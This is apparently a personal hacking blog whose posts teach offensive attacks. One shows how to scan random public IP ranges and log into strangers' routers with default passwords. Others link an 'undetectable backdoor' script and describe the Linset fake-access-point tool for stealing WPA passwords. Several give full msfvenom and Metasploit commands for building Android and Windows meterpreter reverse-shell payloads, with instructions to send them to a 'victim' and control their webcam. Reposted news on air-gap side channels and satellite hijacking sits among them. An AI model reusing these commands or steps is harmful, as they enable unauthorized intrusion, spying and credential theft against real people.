Search

Cyber Security

Cybersecurity is the body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access. In a computing context, security includes both cybersecurity and physical security | vishal waghmare

Month

December 2015

How to Randomly Hack a Home Routers

In this tutorial “How to Randomly Hack a Home Routers”, we are going to show you how to use port scanner to identify home routers (and even office routers :p) and after that we will try to log in to those routers.

In the world most of users doesn’t change there router’s default password because most of them only know how to use without know how to configure the router itself. So that’s the point. We can use that vulnerability to hack the routers.
Requirements:

  • Port Scanner (I use zenmap in this tutorial)
  • Web Browser (I use Google Chrome)
  • Internet Connection

First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.
How to Randomly Hack a Home Routers

Step by Step How to Randomly Hack a Home Routers

1. We should select an IP range. I have selected IP range that includes my public IP address.
XXX.XXX.30.0-XXX.XXX.30.255
2. Now let’s scan for home routers.

When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).
I have found many IP addesses with port 80 is opened.
How to Randomly Hack a Home Routers
So I stopped my scan.
3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.
How to Randomly Hack a Home Routers
4. If you see the alert error messages, it says TD-8817. So we can Google for it
search “TD-8817 default username and password
How to Randomly Hack a Home Routers
5. Now let’s try to access these IP addresses using default logins we just got on step 4.
Default username and passwords are not same for every routers.
With username : admin and password : admin, we can log in to the router administration page
How to Randomly Hack a Home Routers
Attacker can do several harmful things when they can access router page, such as:

  • Redirecting DNS to malicious websites
  • Phishing Attacks
  • etc

Conclusion:
Because most of users doesn’t change their router passwords. It’s a very bad habit because hackers can access your router form anyplace through internet when you are online and It is very harmful to you. So you must change your home router’s password. Keep it on you mind.

Make Undetctable Backdoor Using Unicorn Script

Make undetctable backdoor using unicorn script
Download script : https://userscloud.com/9m5cpirnomxh
After downloaad extract archive to home and type in terminal

Wait a while and then check your directory. 3 files will be generated. Open unicorn.c and copy all content and compile it like the following

Screenshot from 2015-12-27 14:38:30
Then download the file
Check results:
Screenshot from 2015-12-27 14:41:57

Cyber Spy Tools: 6 Insane Ways To Hack An Offline PC Or Smartphone

Is unplugging your Internet connection enough to hide from prying eyes? Certainly Not. Just because you’re offline doesn’t mean your computer or your Smartphone can’t be hacked. Chances are high that you are one of the owners of nearly 100,000 computers around the world in which the National Security Agency has implanted software that enables it to enter and alter data in computers even if they are not connected to the Internet. Dubbed Quantum, this secret technology relies on a covert channel of radio waves that can be broadcast from up to eight miles away and insert packets of data in milliseconds.
Here are 6 other noble ways that people with malicious intent can use to hack your computer and Smartphones even if they aren’t connected to the Internet.
Electromagnetic Spying

Any operational device that is connected to a power line generates electromagnetic radiation that can be intercepted by proven technologies. These electromagnetic radiations could reveal sensitive information such as keystrokes.
Data can be intercepted more easily if the target computer is connected to the power line. Voltage fluctuations that correspond to keystrokes create noise in the ground line. The ground line noise can be intercepted by a hacker connected to a nearby power socket. The price for the equipment with the effective range of 50 feet (15 meters) is $500.”
Key Logger Spying
A hacker could use your Smartphone to track what you are typing on the keyboard of your computer if your phone and PC are sitting just inches apart. According to computer scientists at Georgia Tech, the accelerometers in many Smartphones —the internal device that detects when and how the phone is tilted — could be used to decipher what you type into your PC keyboard — including passwords and e-mail content — with up to 80% accuracy.
“The technique depends on the person typing at their computer with their mobile phone on the desk nearby. The vibrations created by typing onto the computer keyboard can be detected by the accelerometer of the phone and translated by a program into readable sentences.”
Motion Spying
According to researchers at Nanjing University in China, hackers can track the movements of millions of subway riders around the world with up to 92% accuracy by not using GPS but by breaking into Smartphone motion sensors.
“If a person takes the metro, a malicious application on her Smartphone can use the accelerometer readings to trace her, i.e., infer where she gets on and off the train. The cause is that metro trains run on tracks, making their motion patterns distinguishable from cars or buses running on ordinary roads… The running of a train between two neighboring stations produces a distinctive fingerprint in the readings of 3-axis accelerometer of the mobile device, leveraging which attackers can infer the riding trace of a passengerThe ability to track subway riders represents a significant cyber security threat to the tens of millions of people who use public transportation every day.
Sniffing Keystrokes With Lasers And Voltmeters
If hackers can tap into an electrical socket near a computer or if they can draw a bead on the device with a laser, they can steal whatever is being typed into it. The equipment to carry out the power-line attack could cost as little as $500, and the laser attack gear costs about $100 if the attacker already owns a laptop with a sound card.

BitWhisper
Researchers at Ben Gurion University in Israel have shown that it’s possible to rig up two-way communication with an air-gapped computer via heat exchange. By detecting the heat from one computer to an adjacent computer, it is possible to establish a channel that can facilitate the spread of keys, malicious code and any kind of data.
BitWhisper provides a feasible covert channel, suitable for delivering command and control (C&C) messages, and leaking short chunks of sensitive data such as passwords.”

Hacking Though Steel Walls
As a doctoral student at Rensselaer Polytechnic Institute, Tristan Lawry developed and demonstrated an innovative new system in 2011 that uses ultrasound to simultaneously transmit large quantities of data and power wirelessly through thick metal walls, like the hulls of ships and submarines.
“Using the three main building blocks of electrical engineering — power, communications, and computing — Lawry has developed a system that can communicate through a thick metal wall without the need for a battery or any supplemental power source. This means sensors on the outer hull of submarines can be made to work with systems on the other side of the wall for many years without the need for human intervention.”

How To Hack Satellite Internet & Surf Anonymously

How To Hack Satellite Internet & Surf Anonymously

 

 

A Spanish researcher demos new satellite-hijacking tricks with cybercriminal potential.
Satellites can bring a digital signal to places where the Internet seems like a miracle: off-the-grid desert solar farms, the Arctic or an aircraft carrier at sea. But in beaming data to and from the world’s most remote places, satellite Internet may also offer its signal to a less benign recipient: any digital miscreant within thousands of miles.
In a presentation at the Black Hat security conference in Arlington, Va., Tuesday, Spanish cybersecurity researcher Leonardo Nve presented a variety of tricks for gaining access to and exploiting satellite Internet connections. Using less than $75 in tools, Nve, a researcher with security firm S21Sec, says that he can intercept Digital Video Broadcast (DVB) signals to get free high-speed Internet. And while that’s not a particularly new trick–hackers have long been able to intercept satellite TV or other sky-borne signals–Nve also went a step further, describing how he was able to use satellite signals to anonymize his Internet connection, gain access to private networks and even intercept satellite Internet users’ requests for Web pages and replace them with spoofed sites.

“What’s interesting about this is that it’s very, very easy,” says Nve. “Anyone can do it: phishers or Chinese hackers … it’s like a very big Wi-Fi network that’s easy to access.”
In a penetration test on a client’s network, Nve used a Skystar 2 PCI satellite receiver card, a piece of hardware that can be bought on eBay ( EBAY – news – people ) for $30 or less, along with open source Linux DVB software applications and the network data analysis or “sniffing” tool Wireshark.
Exploiting that signal, Nve says he was able to impersonate any user connecting to the Internet via satellite, effectively creating a high-speed, untraceable anonymous Internet connection that that can be used for nefarious online activities.
Nve also reversed the trick, impersonating Web sites that a satellite user is attempting to visit by intercepting a Domain Name System (DNS) request–a request for an Internet service provider (ISP) to convert a spelled out Web site name into the numerical IP address where it’s stored–and sending back an answer faster than the ISP. That allows him to replace a Web site that a user navigates to directly with a site of his choosing, creating the potential for undetectable cybercrime sites that steal passwords or installs malicious software.
In his tests on the client’s network, Nve says he was also able to hijack signals using GRE or TCP protocols that enterprises use to communicate between PCs and servers or between offices, using the connections to gain access to a corporation or government agency’s local area network.
The Barcelona-based researcher tested his methods on geosynchronous satellites aimed at Europe, Africa and South America. But he says there’s little doubt that the same tricks would work on satellites facing North America or anywhere else.
What makes his attacks possible, Nve says, is that DVB signals are usually left unencrypted. That lack of simple security, he says, stems from the logistical and legal complications of scrambling the signal, which might make it harder to share data among companies or agencies and–given that a satellite signal covers many countries–could run into red tape surrounding international use of cryptography. “Each [country] can have its own law for crypto,” says Nve. “It’s easier not to have encryption at the DVB layer.”
Nve isn’t the first to show the vulnerability of supposedly secure satellite connections. John Walker, a British satellite enthusiast, told the BBC in 2002 that he could watch unencrypted NATO video feeds from surveillance sorties in the Balkans. And the same lack of encryption allowed insurgents to hack into the video feed of unmanned U.S. drone planes scouting Afghanistan, the Wall Street Journal reported in December.
In fact, the techniques that Nve demonstrated are probably known to other satellite hackers but never publicized, says Jim Geovedi, a satellite security researcher and consultant with the firm Bellua in Indonesia. He compares satellite hacking to early phone hacking or “phreaking,” a practice that’s not well protected against but performed by only a small number of people worldwide. “This satellite hacking thing is still considered blackbox knowledge,” he wrote in an e-mail to Forbes. “I believe there are many people out there who conduct similar research. They may have some cool tricks but have kept them secret for ages.”
At last year’s Black Hat D.C. conference, British cybersecurity researcher Adam Laurie demonstrated how he intercepts satellite signals with techniques similar to Nve, using a DreamBox satellite receiver and Wireshark. But Nve argues that his method is far cheaper–Laurie’s DreamBox setup cost around $750–and that he’s the first to demonstrate satellite signal hijacking rather than mere interception.
“I’m not just talking about watching TV,” says Nve. “I’m talking about doing some very scary things.”

 

 

MOST ESSENTIAL HACKERS E BOOK COLLECTION



3 IN ONE HACKING GUIDE PACK | eBooks | Computers



A complete guide for all those who wish to learn hacking.

3 IN ONE HACKING TUTORIAL PACK
These 3 books are the most essential ones for those who eish to learn hacking.You can learn even if you are a beginner.

– See more at: http://planetshacker.blogspot.com/2014/12/most-essential-hackers-e-book-collection.html#sthash.gIVrGNHM.dpuf

Linset: Crack WPA/WPA2 Wifi Password without Brute Force Attack on Kali Linux 2.0

how to hack wifi without using pass list by using lineset in kali linux




What is linset bash script?

First of all, commented That this is a project for educational purposes Have That served to me (and hopefully others) to be more in touch With the world of programming and Wireless. It is prohibited under any Circumstances Use this tool in the foregin Wireless Networks!

How it works?

  • Scan the networks.
  • Select network.
  • Capture handshake (can be used without handshake)
  • We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)
  • Mounts one imitating the original The FakeAP
  • A DHCP server is created on FakeAP
  • It Creates a DNS server to redirect all requests to the Host
  • The web server With the selected interface is Launched
  • The mechanism is Launched to check the validity of the passwords That Will Be Introduced
  • It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.
  • The attack will stop after checking the correct password
Are Necessary tengais installed dependencies, Which Linset check and Indicate Whether They are installed or not.
Also it is preferable that you ‘still keep the patch for the negative channel , Because if not, you will Have to attack Correctly complications relizar

How to use

$ Chmod + x linset
$ ./linset

Download

Tutorial

How to install linset on Kali Linux 2.0


How to install linset on Kali Linux 2.0 by Kalilinux 

How to use Linset to get WPA/WPA2 Wifi Password


Linset–Crack WPA-WPA2 Wifi Password without… by prince villu




hack android 100% use kali 2 | prince villu

hack android 100% by villu


how to hack android use kai linux 2 

#msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=81 R > txt.apk


send to victim


#msfconsole
#use multi/handler
#set PAYLOAD android/meterpreter/reverse_tcp
#set LHOST ip
#set LPORT 81
#exploit


done




here i am prince villu

follow me on twitter http://www.twitter.com/thevishalboss
add me on facebook http://www.facebook.com/realvilu

2016 latest trick to hack windows 7/8/10 or remote access. | villu prince

how  to hack windows latest trick by use kali 2

open terminal of your kali 2

type msfconsole


#msfconsole
#use windows/meterpreter/reverse_tcp
#show options


check which comand or which information should give proper


#set LHOST [ip gate from whoim.com or check ur public ip]
#generate -t exe -f file.exe
#ls

chack ur file location


send it to victim ( target pc)


how?? by uplad it on any file uploader like 4share.com or qfs.mobi ) ok ?? any problem comment me i will halpe you…



now what next??/


#back
#clear
#use exploit/multi/handler
#set PAYLOAD windows/meterpreter/reverse_tcp

now you should port forword type your gateway in browser 

it may 192.168.1.1 or 192.168.0.1

put user and pass of ur router it may 

username :admin
password: admin


go to prot forword table add port 4444
put ur private ip 
u can get it by type ifconfig in new terminal u get it it may like 192.168.1.103 or samething like

took your status tcp

add done



type your LHOST
#set LHOST [it may public or private]
set LPORT 4444

#show options 


check connection done or not




#exploit



transfer file.exe to target by email or file uplader


even target install that file you get session and target now online under ur attack

done 😀

u get meterpreter> console ???? as u get conole type help

#help



use any comand to use target 



u can watch webcam transfer any file or manupulate target as u want to :;::::


ok ?/ 
😀


hmmm thanku 




prince villu here give me same reply 😀

hack windows 7 webcam

hack windows 7 webcam



open new terminal in kali linux 2

#msfvenom -p windows/meterpreter/reverse_tcp  lhost=[ip] lport=4444 -e cmd/powershell_base64 -i 5 -f  exe > /root/Desktop/back.exe

send it to your victim 


open msfconsole


#use expoit/multi/handler

#set PAYLOAD windows/meterpreter/reverse_tcp
#set LHOST ip
#set LPORT 4444



#exploit



done





thanku




prince villu here

Create a free website or blog at WordPress.com.

Up ↑